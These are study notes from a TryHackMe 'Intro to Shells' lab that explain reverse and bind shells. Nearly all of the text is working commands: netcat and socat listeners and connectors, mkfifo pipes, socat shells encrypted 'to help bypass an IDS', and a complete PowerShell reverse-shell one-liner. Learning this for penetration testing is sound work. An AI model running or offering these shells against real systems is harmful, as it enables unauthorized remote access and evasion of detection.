Shells

https://tryhackme.com/r/room/introtoshells

There are two kinds of shell when it comes to exploiting a target:

• Reverse Shell: When the target is forced to execute code that connects back to the attack box. ATTACK BOX: nc -nvlp 1337 TARGET: nc -nv $ATTACKBOX 1337 -e /bin/bash

• Bind Shell: The code executed on the target is used to start a listener attached to a shell. TARGET: nc -nvlp 1337 -e "cmd.exe" ATTACK BOX: nc $TARGET 1337

Shells can also be either interactive or non-interactive.

• Interactive: These shells allow a user to interact with programs after execution. Some programs require interaction such as ssh commands with a password or sudo commands with a password.

• Non-Interactive: The user is limited to using programs that do not require user interaction. This can cause interactive commands to make a non-interactive shell stall and become unusable because the expected input is being asked in another location.

Netcat

Netcat is the most basic tool in a pentester's toolkit when it comes to networking.

Reverse Shell: nc -nvlp $PORT

• -l: Tells netcat it is a listener

• -v: Requests verbose output

• -n: Tells netcat not to resolve host names or use DNS

• -p: Indications that a port specification will follow

Bind Shell: nc $TARGET $PORT

Socat

The socat tool acts as a connector between two points. These points could be listening ports, keyboards, files, etcetera.

Reverse Shell: socat TCP-l:$PORT -

To connect to this reverse shell listening on an attack box, the following commands can be used from the following Windows or Linux target:

# Windows
socat TCP:$IP:$PORT EXEC:powershell.exe,pipes
# Linux
socat TCP:$IP:$PORT EXEC:"bash -li"

The pipes option is used to force powershell to use Unix style standard input and output.

Bind Shell: socat TCP:$TARGET:$PORT -

To start the bind shell on the target, the following command can be used:

# Windows
socat TCP-L:$PORT EXEC:powershell.exe,pipes
# Linux
socat TCP-L:$PORT EXEC:"bash -li"

Socat TTY

Socat can also be used to build a fully stable Linux tty reverse shell. It is significantly more stable than the standard socat tunnel or a netcat connection.

TTY Listener: socat TCP-L:$PORT FILE:`tty`,raw,echo=0

The target must have socat installed to connect back to this specific listner. If not, downloading a precompiled socat binary can also execute the reverse shell. The connect command from the target would look like the following:

socat TCP:$IP:$PORT EXEC:"bash -li",pty,stderr,sigint,setsid,sane

Socat Encryption

Another great capability of socat is creating encrypted shells. This can be used to help bypass an IDS. The first step is generating a certificate in order to use encryption:

openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 365 -out shell.crt

This command creates a 2048 bit RSA key with matching cert file, self-signed, and valid for a year. The next part will be merging the two created files:

cat shell.key shell.crt > shell.pem

Now, using the pem file, the listener and connectors can be set up for either reverse shells or bind shells.

Reverse Shell

# Attack Box
socat OPENSSL-LISTEN:$PORT,cert=shell.pem,verify=0 -
# Target
socat OPENSSL:$IP:$PORT,verify=0 EXEC:/bin/bash

Bind Shell

# Target
socat OPENSSL-LISTEN:$PORT,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes
# Attack Box
socat OPENSSL:$TARGET:$PORT,verify=0 -

Socat example that uses TTY and OPENSSL

# IP is 10.10.10.5
# Port is 53
# PEM is encrypt.pem
# Reverse shell for linux
# Listener
 socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0
 # Connector
 socat OPENSSL:10.10.10.5:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

MKFIFO

The tool mkfifo which is used to make a named pipe (first in-first out), can also be used to make a reverse shell.

Listener:

mkfifo /tmp/f
nc -nvlp $PORT < /tmp/f | /bin/sh >/tmp/f 2>&1
rm /tmp/f

The command first makes a named pipe at /tmp/f. Then a simple netcat listener is made which connects to the output of the named pipe. The output is immediately piped directly into /bin/sh, sending the stderr output stream into stdout, and sending stdout itself into the input of the named pipe. The connector can be done similarily with the following commands.

Connector:

mkfifo /tmp/f;
nc $IP $PORT < /tmp/f | /bin/sh >/tmp/f 2>&1
rm /tmp/f

Powershell

When targeting a Windows machine, it is common to utilize a Powershell reverse shell. The following is a powershell reverse shell that can be used to connect to a listener on the attack box:

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"